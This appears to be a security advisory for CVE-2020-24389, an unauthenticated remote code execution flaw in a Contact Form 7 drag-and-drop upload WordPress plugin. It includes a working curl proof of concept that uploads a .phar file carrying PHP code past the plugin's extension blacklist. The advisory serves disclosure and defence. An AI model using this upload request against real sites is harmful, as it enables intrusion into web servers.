Drag and Drop Multiple File Upload – Contact Form 7 < 1.3.5.5 – Unauthenticated Remote Code Execution | CVE 2020-24389

Description

The Drag and Drop Multiple File Upload – Contact Form 7 WordPress plugin was vulnerable to Remote Code Execution via file upload.

The plugin used a blacklist of dangerous file extensions that it did not allow to be uploaded, however, the extensions .phar and .phpt were not within the blacklist, which could be used to upload arbitrary PHP code.

Proof of Concept

curl '<URL>' -H 'Content-Type: multipart/form-data; boundary=---------------------------boundary' \
--data-binary $"-----------------------------boundary\n \
Content-Disposition: form-data; name='supported_type'\n\nphar\n-----------------------------boundary\n \
Content-Disposition: form-data; name='size_limit'\n\n10485760\n-----------------------------boundary\n \
Content-Disposition: form-data; name='action'\n\ndnd_codedropz_upload\n-----------------------------boundary\n \
Content-Disposition: form-data; name='security'\n\n<TOKEN>\n-----------------------------boundary\n \
Content-Disposition: form-data; name='upload-file'; filename='CVE.phar'\nContent-Type: whocares\n\n \
<?php\nphpinfo();\n\n\r\n\r\n-----------------------------boundary--\r\n"